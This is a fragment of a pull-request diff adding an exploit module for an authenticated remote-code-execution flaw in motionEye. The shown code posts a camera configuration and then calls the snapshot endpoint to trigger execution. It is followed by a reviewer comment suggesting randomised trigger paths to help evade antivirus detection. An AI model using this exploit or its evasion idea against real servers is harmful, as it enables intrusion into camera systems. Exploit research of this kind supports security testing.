modules/exploits/multi/http/motioneye_auth_rce_cve_2025_60787.rb

```diff
@@ -0,0 +1,404 @@
+          'motion_detection' => true,
+          'frame_change_threshold' => '0.6507161458333334',
+          'max_frame_change_threshold' => '0',
+          'auto_threshold_tuning' => false,
+          'auto_noise_detect' => true,
+          'noise_level' => '13',
+          'light_switch_detect' => '0',
+          'despeckle_filter' => false,
+          'event_gap' => '30',
+          'pre_capture' => '1',
+          'post_capture' => '1',
+          'minimum_motion_frames' => '20',
+          'motion_mask' => false,
+          'motion_mask_type' => 'smart',
+          'smart_mask_sluggishness' => '5',
+          'motion_mask_lines' => [],
+          'show_frame_changes' => false,
+          'create_debug_media' => false,
+          'email_notifications_enabled' => false,
+          'email_notifications_from' => '',
+          'email_notifications_addresses' => '',
+          'email_notifications_smtp_server' => '',
+          'email_notifications_smtp_port' => '',
+          'email_notifications_smtp_account' => '',
+          'email_notifications_smtp_password' => '',
+          'email_notifications_smtp_tls' => false,
+          'email_notifications_picture_time_span' => '0',
+          'telegram_notifications_enabled' => false,
+          'telegram_notifications_api' => '',
+          'telegram_notifications_chat_id' => '',
+          'telegram_notifications_picture_time_span' => '0',
+          'web_hook_notifications_enabled' => false,
+          'web_hook_notifications_url' => '',
+          'web_hook_notifications_http_method' => 'GET',
+          'web_hook_end_notifications_enabled' => false,
+          'web_hook_end_notifications_url' => '',
+          'web_hook_end_notifications_http_method' => 'GET',
+          'command_notifications_enabled' => false,
+          'command_notifications_exec' => '',
+          'command_end_notifications_enabled' => false,
+          'command_end_notifications_exec' => '',
+          'working_schedule' => false,
+          'monday_from' => '',
+          'monday_to' => '',
+          'tuesday_from' => '',
+          'tuesday_to' => '',
+          'wednesday_from' => '',
+          'wednesday_to' => '',
+          'thursday_from' => '',
+          'thursday_to' => '',
+          'friday_from' => '',
+          'friday_to' => '',
+          'saturday_from' => '',
+          'saturday_to' => '',
+          'sunday_from' => '',
+          'sunday_to' => '',
+          'working_schedule_type' => 'during',
+          'video_controls' => {},
+          'resolution' => '640x480'
+        }
+      }.to_json
+    )
+
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, "#{peer} Server did not respond with the expected HTTP 200")
+    end
+
+    print_good('Exploit installation completed')
+  end
+
+  def run_exploit(camera_id)
+    print_status('Executing exploit...')
+
+    res = send_signed_request_cgi(
+      'uri' => normalize_uri(target_uri.path, "/action/#{camera_id}/snapshot/"),
```

Comment:
Ah so this appears to be within the `snapshot` functionality, or is this just a sample function that uses the configuration? Might be good to clarify this as if there are other functions that can trigger this issue, it might be an idea to create a list of these and then randomly select one of them to help avoid AV a bit more.